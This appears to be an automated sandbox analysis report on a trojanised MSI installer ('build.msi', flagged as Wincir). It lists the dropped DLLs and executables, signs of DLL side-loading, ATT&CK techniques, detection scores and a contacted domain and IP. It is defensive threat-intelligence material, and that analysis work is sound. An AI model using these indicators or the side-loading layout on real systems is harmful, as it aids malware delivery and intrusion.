    Source: Binary string: SumatraPDF-dll.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: build.msi
    Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: build.msi
    Source: Binary string: C:\Users\kjk\src\sumatrapdf\out\rel64\SumatraPDF.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: -64.pdb.lzsa source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: </html>.pdb<<html> source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: build.msi
    Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: vk_swiftshader.dll.4.dr
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\SumatraPDF-dll.pdb source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Web.WebView2.Core.pdb source: build.msi
    Source: Binary string: ucrtbase.pdbUGP source: build.msi
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: build.msi, MSI6E8B.tmp.4.dr, MSI6501.tmp.4.dr
    Source: Binary string: ITSF.txt.js.json.xml.logfile_id.dizread.me.nfo.tcr.ps.ps.gz.eps.fb2.fb2z.fbz.zfb2.fb2.zip.cbz.cbr.cb7.cbt.pdf.xps.oxps.chm.png.jpg.jpeg.gif.tif.tiff.bmp.tga.jxr.hdp.wdp.webp.epub.mobi.prc.azw.azw1.azw3.pdb.html.htm.xhtml.svg.djvu.jp2.zip.rar.7z.heic.avif.tarfoo.epubfoo.JP2Rar! source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\SumatraPDF.pdb source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.4.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdb source: build.msi
    Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb)) source: build.msi
    Source: Binary string: d:\build\ob\bora-16964525\cayman_libsigcpp2\libsigcpp2\src\MSVC_Net2015\Win32\Release\sigc-2.0.pdb source: sigc-2.0.dll.4.dr
    Source: Binary string: c:\repos\clink\.build\release\~working\.build\vs2019\bin\final\clink_dll_x64.pdb source: clink_dll_x64.dll.4.dr
    Source: Binary string: Unable to get temp pathcopy_dllclink\dll_cache\1.4.6.8b1dec_%08xUnable to create path '%s'\clink_dll_x86.dll.originFailed to create origin file at '%s'Failed to copy DLL to '%s'.pdbUnable to get DLL version for '%s'check_dll_version\Unable to query DLL version info for '%s'DLL version: %08x %08x%s%swait_monitor::on_waited source: clink_dll_x86.dll.4.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdbj source: build.msi
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: build.msi
    Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: build.msi
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: build.msi
    Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: build.msi
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\libmupdf.pdbK_ source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\SumatraPDF-dll.pdbo Verfa source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: build.msi
    Source: Binary string: D:\build\ob\bora-21139696\bora\build\build\LIBRARIES\adjperm\win32\release\adjperm.pdb source: adjperm.dll.4.dr
    Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsaI source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsa source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\a\_work\1\s\BuildOutput\Release\x86\Microsoft.UI.Xaml\Microsoft.UI.Xaml.pdb source: build.msi
    Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: build.msi
    Source: Binary string: SumatraPDF.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb source: build.msi
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: build.msi
    Source: Binary string: SumatraPDF.pdbSumatraPDF-dll.pdblibmupdf.pdbInstallCrashHandler: skipping because !crashDumpPath source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: build.msi
    Source: launcher.exe.4.drStatic PE information: section name: _RDATA
    Source: libssl-1_1-x64.dll.4.drStatic PE information: section name: .00cfg
    Source: vk_swiftshader.dll.4.drStatic PE information: section name: .gxfg
    Source: vk_swiftshader.dll.4.drStatic PE information: section name: .retplne
    Source: vk_swiftshader.dll.4.drStatic PE information: section name: _RDATA
    Source: vulkan-1.dll.4.drStatic PE information: section name: .gxfg
    Source: vulkan-1.dll.4.drStatic PE information: section name: .retplne
    Source: vulkan-1.dll.4.drStatic PE information: section name: _RDATA
    Source: clink_dll_x64.dll.4.drStatic PE information: section name: _RDATA
    Source: clink_dll_x64.dll.4.drStatic PE information: section name: .detourc
    Source: clink_dll_x64.dll.4.drStatic PE information: section name: .detourd
    Source: clink_dll_x86.dll.4.drStatic PE information: section name: .detourc
    Source: clink_dll_x86.dll.4.drStatic PE information: section name: .detourd
    Source: ffmpeg.dll.4.drStatic PE information: section name: .gxfg
    Source: ffmpeg.dll.4.drStatic PE information: section name: .retplne
    Source: ffmpeg.dll.4.drStatic PE information: section name: _RDATA
    Source: libEGL.dll.4.drStatic PE information: section name: .gxfg
    Source: libEGL.dll.4.drStatic PE information: section name: .retplne
    Source: libEGL.dll.4.drStatic PE information: section name: _RDATA
    Source: libGLESv2.dll.4.drStatic PE information: section name: .gxfg
    Source: libGLESv2.dll.4.drStatic PE information: section name: .retplne
    Source: libGLESv2.dll.4.drStatic PE information: section name: _RDATA
    Source: MSI6389.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI6501.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI6560.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI659F.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI65EE.tmp.4.drStatic PE information: section name: .fptable
    Source: MSI6E8B.tmp.4.drStatic PE information: section name: .fptable
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gmodule-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmclientcore.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E8B.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x86.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntloc.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmeventmsg.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\elevate.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x64.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\ffmpeg.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libEGL.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\adjperm.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\zlib1.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6389.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\sigc-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\UAC.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntjpn.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI65EE.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\mksSandbox.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libssl-1_1-x64.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x86.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\d3dcompiler_47.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gthread-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6501.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libcds.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\basichttp.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libGLESv2.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6560.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vk_swiftshader.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntdeu.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmauthd.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI659F.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x64.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vulkan-1.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\LICENSE.electron.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gmodule-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmclientcore.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6E8B.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x86.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntloc.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmeventmsg.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\elevate.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x64.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libEGL.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\ffmpeg.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\adjperm.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\zlib1.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI6389.tmp
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\sigc-2.0.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\UAC.exe
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntjpn.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI65EE.tmp
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\mksSandbox.exe
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libssl-1_1-x64.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exe
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\d3dcompiler_47.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x86.exe
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gthread-2.0.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI6501.tmp
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libcds.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libGLESv2.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\basichttp.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI6560.tmp
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vk_swiftshader.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntdeu.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmauthd.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x64.dll
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI659F.tmp
    Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vulkan-1.dll
    Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
    Source: mksSandbox.exe.4.dr | Binary or memory string: VMware
    Source: mksSandbox.exe.4.dr | Binary or memory string: Disabling GL due to software/VMware card found.
    Source: mksSandbox.exe.4.dr | Binary or memory string: Check the mksSandbox.log and vmware.log for more details.
    Source: adjperm.dll.4.dr | Binary or memory string: 1998-2023 VMware, Inc.@
    Source: mksSandbox.exe.4.dr | Binary or memory string: VMware VMGI Translator (shader %u)
    Source: sigc-2.0.dll.4.dr | Binary or memory string: VMware, Inc.1!0
    Source: MSI717A.tmp.4.dr | Binary or memory string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dll
    Source: MSI717A.tmp.4.dr | Binary or memory string: &{7426186F-614E-467C-B53F-944BB30B0D91}LC:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dll@
    Source: MSI717A.tmp.4.dr | Binary or memory string: vmnetBridge.dll@@
    Source: adjperm.dll.4.dr | Binary or memory string: CreateVMwareGroup
    Source: ffmpeg.dll.4.dr | Binary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tga
    Source: mksSandbox.exe.4.dr | Binary or memory string: mks.gl.allowSoftwareAndVMwareDrivers
    Source: sigc-2.0.dll.4.dr | Binary or memory string: http://www.vmware.com/0/
    Source: sigc-2.0.dll.4.dr | Binary or memory string: VMware, Inc.1
    Source: MSI717A.tmp.4.dr | Binary or memory string: vmnetBridge.dll
    Source: adjperm.dll.4.dr | Binary or memory string: ProductNameVMware WorkstationP
    Source: build.msi | Binary or memory string: vmnetBridge.dllx~
    Source: adjperm.dll.4.dr | Binary or memory string: CompanyNameVMware, Inc.@
    Source: mksSandbox.exe.4.dr | Binary or memory string: vmware-mksMKSRoleMain: Initializing Preference...
    Source: mksSandbox.exe.4.dr | Binary or memory string: SPV_EXT_demote_to_helper_invocationSPV_KHR_float_controlsGLSL.std.450VMW.001VMware VMGI Translator (shader %u)%sBufArrayvmgi2spirv: Dynamic constant buffers are not supported.They will always be mapped to buffer 0.
    Source: adjperm.dll.4.dr | Binary or memory string: name="VMware.VMware.adjperm"
    Source: sigc-2.0.dll.4.dr | Binary or memory string: noreply@vmware.com0
    Source: MSI717A.tmp.4.dr | Binary or memory string: VMNETB~1.DLL|vmnetBridge.dll
    Source: mksSandbox.exe.4.dr | Binary or memory string: vmware
    Source: mksSandbox.exe.4.dr | Binary or memory string: mks.consolePTUseVMwareVID
    Source: adjperm.dll.4.dr | Binary or memory string: SeInteractiveLogonRightSOFTWARE\VMware, Inc.\SIDVMware User Group__vmware__
    Source: mksSandbox.exe.4.dr | Binary or memory string: vmware-mks
    Source: mksSandbox.exe.4.dr | Binary or memory string: bora\mks\role\common\mksRoleMain.cvmware-%u-mks-%u.logcustom@&!*@*@(msg.log.initFailed)Unable to proceed without a log file.
    Source: mksSandbox.exe.4.dr | Binary or memory string: vmware-%u-mks-%u.log
    Source: adjperm.dll.4.dr | Binary or memory string: adjperm.dllCreateVMwareGroupDeleteVMwareGroupLimitFileAccessSecureKeyAdminReadSecureRegEntries<>
    Source: mksSandbox.exe.4.dr | Binary or memory string: GLBasic: VMwareSVGA3DllvmpipeMesaDisabling GL due to software/VMware card found.
    Source: adjperm.dll.4.dr | Binary or memory string: DeleteVMwareGroup
    Source: ffmpeg.dll.4.dr | Binary or memory string: VMware Screen Codec / VMware Video
    Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe "C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe"
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: Shell_TrayWndKillProcessesUsingInstallation()
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
    Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe | Code function: 9_2_00007FF7362F4F68 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_00007FF7362F4F68
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
    Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
    Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
    Privilege Escalation: 2 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
    Defense Evasion: 21 Masquerading; 1 Disable or Modify Tools; 1 Virtualization/Sandbox Evasion; 2 Process Injection; 1 Obfuscated Files or Information; 11 Software Packing; 1 DLL Side-Loading; 1 File Deletion
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
    Discovery: 1 System Time Discovery; 11 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Peripheral Device Discovery; 1 File and Directory Discovery; 23 System Information Discovery; System Owner/User Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
    Command and Control: 1 Encrypted Channel; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
    [Behavior graph. ID: 1648463; Sample: build.msi; Startdate: 25/03/2025; Architecture: WINDOWS; Score: 72. Signatures shown: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus detection for dropped file; Multi AV Scanner detection for submitted file. msiexec.exe dropped C:\Windows\Installer\MSI6E8B.tmp (PE32), C:\Windows\Installer\MSI65EE.tmp (PE32), C:\Windows\Installer\MSI659F.tmp (PE32) and 36 other malicious files, and started msiexec.exe and launcher.exe; the started msiexec.exe is linked to shaundoose.com (104.21.64.101, 443, 49721, CLOUDFLARENETUS, United States).]

    Source | Detection | Scanner | Label
    build.msi | 31% | Virustotal |
    build.msi | 25% | ReversingLabs | Win32.Trojan.Wincir
    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\logd.bat | 100% | Avira | BAT/Wincir.chwfc
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntdeu.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntjpn.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntloc.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\adjperm.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\basichttp.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\d3dcompiler_47.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\ffmpeg.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gmodule-2.0.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gthread-2.0.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libEGL.dll | 0% | ReversingLabs |
